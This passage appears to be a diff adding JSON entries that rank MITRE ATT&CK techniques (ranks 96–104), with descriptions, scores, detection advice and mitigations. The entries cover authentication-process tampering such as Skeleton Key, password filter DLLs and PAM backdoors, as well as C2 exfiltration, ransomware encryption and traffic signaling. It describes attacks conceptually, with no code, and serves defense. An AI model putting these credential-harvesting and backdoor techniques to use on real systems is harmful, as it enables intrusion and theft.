the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)", + "url": "https://attack.mitre.org/techniques/T1505/004", + "detection": "Monitor for creation and/or modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to %windir%\\system32\\inetsrv\\config\\applicationhost.config could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)\nMonitor execution and command-line arguments of AppCmd.exe, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + } + ] + }, + { + "rank": 96, + "tid": "T1556", + "name": "Modify Authentication Process", + "description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using Valid Accounts.\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.", + "url": "https://attack.mitre.org/techniques/T1556", + "detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference. \nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)\nMonitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \nMonitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\nMonitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).", + "score": 0.7134285714285715, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1025", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "url": "https://attack.mitre.org/mitigations/M1025" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ], + "subtechniques": [ + { + "tid": "T1556.001", + "name": "Modify Authentication Process: Domain Controller Authentication", + "description": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. \nMalware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: Skeleton Key). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)", + "url": "https://attack.mitre.org/techniques/T1556/001", + "detection": "Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). ", + "mitigations": [ + { + "mid": "M1025", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "url": "https://attack.mitre.org/mitigations/M1025" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ] + }, + { + "tid": "T1556.002", + "name": "Modify Authentication Process: Password Filter DLL", + "description": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. \nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. \nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)", + "url": "https://attack.mitre.org/techniques/T1556/002", + "detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference.\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1556.003", + "name": "Modify Authentication Process: Pluggable Authentication Modules", + "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)", + "url": "https://attack.mitre.org/techniques/T1556/003", + "detection": "Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\nLook for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ] + }, + { + "tid": "T1556.004", + "name": "Modify Authentication Process: Network Device Authentication", + "description": "Adversaries may use Patch System Image to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.\nModify System Image may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)", + "url": "https://attack.mitre.org/techniques/T1556/004", + "detection": "Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\nDetection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as Modify System Image.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ] + } + ] + }, + { + "rank": 97, + "tid": "T1041", + "name": "Exfiltration Over C2 Channel", + "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", + "url": "https://attack.mitre.org/techniques/T1041", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "score": 0.7054839747619048, + "network_score": 0.2, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + } + ], + "subtechniques": [] + }, + { + "rank": 98, + "tid": "T1199", + "name": "Trusted Relationship", + "description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, Valid Accounts used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)", + "url": "https://attack.mitre.org/techniques/T1199", + "detection": "Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, an adversary may have access to significant amounts of information about the target before conducting an operation, especially if the trusted relationship is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion.", + "score": 0.7023523809523808, + "network_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + } + ], + "subtechniques": [] + }, + { + "rank": 99, + "tid": "T1573", + "name": "Encrypted Channel", + "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.", + "url": "https://attack.mitre.org/techniques/T1573", + "detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "score": 0.6914941288228571, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1020", + "name": "SSL/TLS Inspection", + "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.", + "url": "https://attack.mitre.org/mitigations/M1020" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "subtechniques": [ + { + "tid": "T1573.001", + "name": "Encrypted Channel: Symmetric Cryptography", + "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.", + "url": "https://attack.mitre.org/techniques/T1573/001", + "detection": "With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1573.002", + "name": "Encrypted Channel: Asymmetric Cryptography", + "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as Asymmetric Cryptography.", + "url": "https://attack.mitre.org/techniques/T1573/002", + "detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1020", + "name": "SSL/TLS Inspection", + "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.", + "url": "https://attack.mitre.org/mitigations/M1020" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + } + ] + }, + { + "rank": 100, + "tid": "T1025", + "name": "Data from Removable Media", + "description": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information. \nSome adversaries may also use Automated Collection on removable media.", + "url": "https://attack.mitre.org/techniques/T1025", + "detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 0.6909428571428571, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + } + ], + "subtechniques": [] + }, + { + "rank": 101, + "tid": "T1565", + "name": "Data Manipulation", + "description": "Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\nThe type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "url": "https://attack.mitre.org/techniques/T1565", + "detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.", + "score": 0.6744441238095238, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1029", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "url": "https://attack.mitre.org/mitigations/M1029" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ], + "subtechniques": [ + { + "tid": "T1565.001", + "name": "Data Manipulation: Stored Data Manipulation", + "description": "Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "url": "https://attack.mitre.org/techniques/T1565/001", + "detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1029", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "url": "https://attack.mitre.org/mitigations/M1029" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ] + }, + { + "tid": "T1565.002", + "name": "Data Manipulation: Transmitted Data Manipulation", + "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "url": "https://attack.mitre.org/techniques/T1565/002", + "detection": "Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. ", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ] + }, + { + "tid": "T1565.003", + "name": "Data Manipulation: Runtime Data Manipulation", + "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct Change Default File Association and Masquerading to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "url": "https://attack.mitre.org/techniques/T1565/003", + "detection": "Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + } + ] + } + ] + }, + { + "rank": 102, + "tid": "T1496", + "name": "Resource Hijacking", + "description": "Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. \nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)\nAdditionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)", + "url": "https://attack.mitre.org/techniques/T1496", + "detection": "Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.", + "score": 0.6716643115095239, + "network_score": 0.2, + "file_score": 0.2, + "hardware_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 103, + "tid": "T1486", + "name": "Data Encrypted for Impact", + "description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)\nIn cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)", + "url": "https://attack.mitre.org/techniques/T1486", + "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.\nIn some cases, monitoring for unusual kernel driver installation activity can aid in detection.\nIn cloud environments, monitor for events that indicate storage objects have been anomalously replaced by copies.", + "score": 0.6684509347619048, + "network_score": 0.2, + "hardware_score": 0.2, + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ], + "subtechniques": [] + }, + { + "rank": 104, + "tid": "T1205", + "name": "Traffic Signaling", + "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. Port Knocking), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.\nOn network devices, adversaries may use crafted packets to enable Network Device Authentication for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage Patch System Image due to the monolithic nature of the architecture.\nAdversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet)", + "url": "https://attack.mitre.org/techniques/T1205", + "detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.\nThe Wake-on-LAN magic packet consists of 6 bytes of FF followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN)", + "score": 0.6681238095238096, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ], + "subtechniques": [ + { + "tid": "T1205.001", + "name": "Traffic Signaling: 